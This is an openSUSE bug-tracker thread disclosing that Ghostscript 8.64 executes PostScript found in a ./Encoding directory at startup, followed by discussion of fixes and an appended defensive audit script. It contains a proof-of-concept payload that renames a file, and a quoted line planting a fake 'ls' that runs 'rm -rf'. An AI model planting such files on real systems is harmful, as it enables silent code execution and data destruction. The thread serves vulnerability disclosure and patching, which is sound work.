[Bug 608071] New: Ghostscript executes random code on startup
Encoding/pwnd
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c0

Summary: Ghostscript executes random code on startup
Classification: openSUSE
Product: openSUSE 11.2
Version: Final
Platform: x86-64
OS/Version: openSUSE 11.2
Status: NEW
Severity: Critical
Priority: P5 - None
Component: Printing
AssignedTo: jsmeix@novell.com
ReportedBy: giecrilj@stegny.2a.pl
QAContact: jsmeix@novell.com
Found By: ---
Blocker: ---

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9

The following script changes the name of file ./test.ps in the current directory to ./pwnd.ps. The attack is performed by a hidden Ghostscript configuration file that should not be treated as a configuration file at all. Steps 1 and 2 are needed only once; indeed, if you have ./Encoding/* for any reason, Ghostscript will execute code from there, and the results will range from annoying to pernicious. The example attack renames a single file; real haxorz are invited to read files or delete them. The script creates ./Encoding for demonstration purposes; if you happen to have any file in ./Encoding/ or $GS_LIB/Encoding, you are PWND each time you run gs.

Reproducible: Always

Steps to Reproduce:
1. mkdir Encoding
2. echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit'
3. gs

Actual Results:
GPL Ghostscript 8.64 (2009-02-03)
Copyright (C) 2009 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file COPYING for details.
PWND BY ARTIFEX HAXORZ
While reading gs_fntem.ps:
Error: /undefined in --quit--
Operand stack: (gs_fntem.ps) 1 FontEmulationProcs encodingnames --nostringval-- --nostringval-- StandardEncoding --nostringval-- ISOLatin1Encoding --nostringval-- SymbolEncoding --nostringval-- DingbatsEncoding --nostringval-- DingbatsEncoding --nostringval-- StandardEncoding --nostringval-- ISOLatin1Encoding --nostringval-- SymbolEncoding --nostringval-- Wingdings pwnd pwnd Encoding
Execution stack: %interp_exit --nostringval-- --nostringval-- --nostringval-- %array_continue --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push --nostringval-- 1831 17 5 %oparray_pop --nostringval-- --nostringval-- --dict:17/21(ro)(G)-- --dict:2/2(G)-- --nostringval-- 1 %dict_continue --nostringval-- --nostringval-- 1829 26 5 %oparray_pop findresource %errorexec_pop --nostringval-- --nostringval-- --nostringval-- --nostringval-- 1220188 pwnd 27 --nostringval-- --nostringval-- false 1 %stopped_push 1755 27 6 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- 1820 26 6 %oparray_pop 1754 26 6 %oparray_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval--
Dictionary stack: --dict:963/3371(G)-- --dict:0/20(G)-- --dict:63/200(L)-- --dict:963/3371(G)-- --dict:10/10(G)-- --dict:17/21(ro)(G)--
Current allocation mode is global

The file test.ps is renamed to pwnd.ps

Expected Results:
Ghostscript should not read ./Encoding/* on startup and start normally. It should not rename any files (unless asked to do it by the user's script).

Here is what Artifex has to say:
We really do not care about the reporter's opinion or curiosity. A simple "Thank you" is sufficient. Any further comment on this bug report will result in the reporter's account being banned. You have been warned.
URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316 -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
Johannes Meixner
Dr. Werner Fink
Ludwig Nussel
Ludwig Nussel
--- Comment #4 from Dr. Werner Fink
--- Comment #5 from Christopher Yeleighton
(In reply to comment #2)
This is what I've explained: only the user can shoot into its feet.
That means the user should not execute Ghostscript in any directory that has a nonempty Encoding subdirectory (that may be needed for sb/sth else). Why do you call that "shooting into its feet"? The user need not create the Encoding directory itself, she can just stumble upon it.

Also, upstream will not do anything about this because they take me for a troll; however, they explicitly stated that they would reconsider given positive feedback from a distro.
--- Comment #6 from Dr. Werner Fink
--- Comment #7 from Christopher Yeleighton
(In reply to comment #5)
Not only ghostscript but also using the `.' in the personal PATH is a simple problem. Suppose that the user does a
cd /tmp
ls
and now suppose another user had done
echo -e '#!/bin/sh\ncd\nrm -rf .' > /tmp/ls
chmod 755 /tmp/ls
... do you see the problem of having `.' at first place within the execution path?

I do not have . in $PATH and I would know how to remove it if I had one. It is not the case with GhostScript: I am exposed and I have no means of preventing it. The various risky directories you cite are just that --- a bunch of risky directories. However, with GhostScript, _any_ directory is risky.

Chris
--- Comment #8 from Dr. Werner Fink
--- Comment #9 from Christopher Yeleighton
Thomas Biege
Ghostscript_8.64 on openSuSE_11.2 executes all files matching ./Encoding/* on startup. This search is relative to the current directory so it is easy to poison Ghostscript and cause it to execute arbitrary PostScript code without user action or knowledge.
Details: URL:https://bugzilla.novell.com/show_bug.cgi?id=608071
Interesting! So if someone creates /tmp/Encoding then it is dangerous to do

cd /tmp; gs any.ps

I now used:

strace -omylog gs
grep '"\./' mylog | sort -u

and that shows that gs tries many files in the current directory, "protection" against just ./Encoding is not enough.

Cheers, Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
--- Comment #11 from Thomas Biege
--- Comment #14 from Ludwig Nussel
Johannes Meixner
Ludwig Nussel
--- Comment #16 from Ludwig Nussel
[...] Furthermore http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583316#10
------------------------------------------------------------------
I have been using a wrapper around gs that sets both -P- -dSAFER. That seems to work fine for viewing PS files, but does NOT allow gv to work for PDFs
-------------------------------------------------------------------
indicates that we should pay particular attention if "-P-" becomes our default whether or not Ghostscript then still works for PDFs.

The mistake in that wrapper is to add -dSAFER always.

$ cat ~/bin/gs
#!/bin/sh
set -- -P- "$@"
echo "$@"
exec /usr/bin/gs "$@"
$ gv /tmp/uebung01.pdf
-P- -dNODISPLAY -dQUIET -sPDFname=uebung01.pdf -sDSCname=/tmp/gv_4bff90b8_1_uebung01.pdf.tmp pdf2dsc.ps -c quit

For PDFs gv actually calls gs to execute a postscript program. That program is from ghostscript itself so no need for -dSAFER there.
--- Comment #17 from Christopher Yeleighton
Aha! So the root of the problem is that -dSAFER isn't honored for those initialization files.
The root of the problem is that Ghostscript insists on reading encodings up front, and assumes that whatever is in an Encoding directory is an encoding program.

If we accept this, although I really do not think we should, the root of the problem is that Ghostscript allows relative path search in its initialization phase.
--- Comment #18 from Ludwig Nussel
--- Comment #19 from Christopher Yeleighton
The -P- option doesn't work for gs_init.ps: http://bugs.ghostscript.com/show_bug.cgi?id=691350
There are three problems with -P-.
1. It is not obvious, and most users will not know.
2. It also changes the way Ghostscript handles command-line arguments, and the vendor claims that Ghostscript users have vehemently protested against that.
3. Short of recompiling, there is no way to configure Ghostscript to use -P- by default. In particular, it cannot be applied as a per-user policy.
It is a big gun to shoot at such a small target, and the cure kills both the infection and the patient :-)
Dr. Werner Fink
--- Comment #21 from Petr Baudis
--- Comment #22 from Christopher Yeleighton
--- Comment #23 from Dr. Werner Fink
--- Comment #24 from Ludwig Nussel
Just to be noted: we have 121 packages which requires ghostscript-library therefore I would like to set SEARCH_HERE_FIRST=0 in the main makefile of ghostscript. Beside the problem with gs_init.ps this cause that no file from current working directory will be read. That will break
Files from the current directory are read despite -P- (i.e. SEARCH_HERE_FIRST) even on sles10 so that problem probably only hits very old ghostscripts. Maybe the fix for reading files specified on the command line from the current directory is the cause for the problem with gs_init.ps?
--- Comment #25 from Dr. Werner Fink
--- Comment #26 from Johannes Meixner
--- Comment #28 from Ludwig Nussel
Michal Marek
Just to be noted: we have 121 packages which requires ghostscript-library therefore I would like to set SEARCH_HERE_FIRST=0 in the main makefile of ghostscript.
Do you have a test package somewhere so that we can try a build against it?
--- Comment #30 from Ludwig Nussel
--- Comment #31 from Dr. Werner Fink
--- Comment #32 from Christopher Yeleighton
(In reply to comment #14)
Aha! So the root of the problem is that -dSAFER isn't honored for those initialization files.
The root of the problem is that Ghostscript insists on reading encodings up front, and assumes that whatever is in an Encoding directory is an encoding program.
If we accept this, although I really do not think we should, the root of the problem is that Ghostscript allows relative path search in its initialization phase.
Correct me if I am wrong but the information supplied upstream [1] seems to indicate that Ghostscript, just like Emacs, does not run its start-up code when it starts with a core ROM image that is prebuilt unless this feature is switched off. This feature can be turned off during build; it is on by default but it is turned off in openSuSE [2]. It seems that Ghostscript should not be vulnerable when it starts off a core image. OTOH, it makes sense for the code in (gs_fntem.ps) to load all possible encodings ONLY IF it is building the start-up image because a safe environment can be assumed at build time.

Summary: I hereby suggest that generating and using the core image for Ghostscript should be turned back on.

== References ==
[1] URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316#c7
[2] URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316#c9
--- Comment #33 from Stefan Dirsch
--- Comment #34 from Christopher Yeleighton
--- Comment #35 from Stefan Dirsch
It should be verified that they do not break when Ghostscript is compiled with SEARCH_HERE_FIRST=0 (as explained in Comment #20). This is the workaround recommended by upstream; however, I think there are milder ways to patch this vulnerability.
Thanks a lot! Are there ghostscript-library packages available for testing?
Danny Kukawka
Stephan Kulow
--- Comment #38 from Christopher Yeleighton
If they do not fail, but silently create broken documentation, it's a big problem with the current timing.
kio_man generates broken documentation and nobody cares. For example, try URL:man:ftp or URL:man:groff_char.
Johannes Meixner
--- Comment #40 from Dr. Werner Fink
--- Comment #41 from Christopher Yeleighton
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9
The following script changes the name of file ./test.ps in the current directory to ./pwnd.ps. The attack is performed by a hidden Ghostscript
This attack works as-is with Okular. In addition, it prevents Okular from rendering anything in the affected directory (of course).
--- Comment #42 from Dr. Werner Fink
--- Comment #43 from Ludwig Nussel
--- Comment #44 from Dr. Werner Fink
Dr. Werner Fink
--- Comment #46 from Christopher Yeleighton
Created an attachment (id=372862) --> (http://bugzilla.novell.com/attachment.cgi?id=372862) [details] ghostscript-8.70-gs_init.dif
Fix the problem with the gs_init.ps ... only open in the current working directory if and only if only the user has write access to the directory
This is likely to be the case when an archive tool creates a temporary directory to store the files to be viewed; it can set the directory to u=rwx only in order to prevent other users from accessing the data. If I understand the patch correctly, it would not block gs_init.ps in such a setting, which is bad.
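As an added example (not code from this bug thread, from the attached patch or from Ghostscript), the POSIX sh audit below applies the directory-permission heuristic the patch is described with, then the content check the reply argues is still needed, and demonstrates the u=rwx scratch-directory case where the mode-only test passes. The function names `dir_writable_only_by_me`, `dir_has_gs_startup_files` and `gs_cwd_ok` are hypothetical, the planted `Encoding/pwnd` file is an empty constructed placeholder, and it assumes POSIX `find`, `id` and `mktemp -d`.

```shell
#!/bin/sh
# Added example (not from the bug thread or from Ghostscript): audit the
# directory gs is about to run in. Assumes POSIX find/id and mktemp -d;
# all function names are hypothetical.

# Mode-only heuristic, as the patch discussed above is described: accept the
# directory only if we own it and nobody else can write to it.
dir_writable_only_by_me() {
    d=$1
    [ -d "$d" ] || return 1
    # owned by the invoking user (POSIX find -user; avoids bash-only [ -O ])
    [ -n "$(find "$d" -prune -user "$(id -un)" -print)" ] || return 1
    # neither the group nor the other write bit is set on the directory itself
    [ -z "$(find "$d" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

# Content check: is anything here that gs reads at startup? Only the names the
# thread itself mentions are tested (Encoding/* and gs_init.ps).
dir_has_gs_startup_files() {
    d=$1
    [ -n "$(find "$d/Encoding" -type f -print 2>/dev/null | head -n 1)" ] && return 0
    [ -f "$d/gs_init.ps" ] && return 0
    return 1
}

# Verdict a wrapper would use: 0 = run gs here, 1 = refuse.
gs_cwd_ok() {
    dir_writable_only_by_me "$1" && ! dir_has_gs_startup_files "$1"
}

# Demonstration of the reply's objection: a u=rwx scratch directory, like one
# an archive viewer would create, passes the mode heuristic even with a planted
# Encoding file. The file is a constructed, empty placeholder.
demo() {
    t=$(mktemp -d) || return 1
    chmod 700 "$t"
    mkdir "$t/Encoding"
    : > "$t/Encoding/pwnd"
    if dir_writable_only_by_me "$t"; then
        echo "mode-only check: directory accepted (this is the gap)"
    fi
    if gs_cwd_ok "$t"; then
        echo "combined check: ok to run gs"
    else
        echo "combined check: refusing to run gs in $t"
    fi
    rm -rf "$t"
}

demo
```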
--- Comment #47 from Dr. Werner Fink
--- Comment #48 from Dr. Werner Fink
Thomas Biege
Johannes Meixner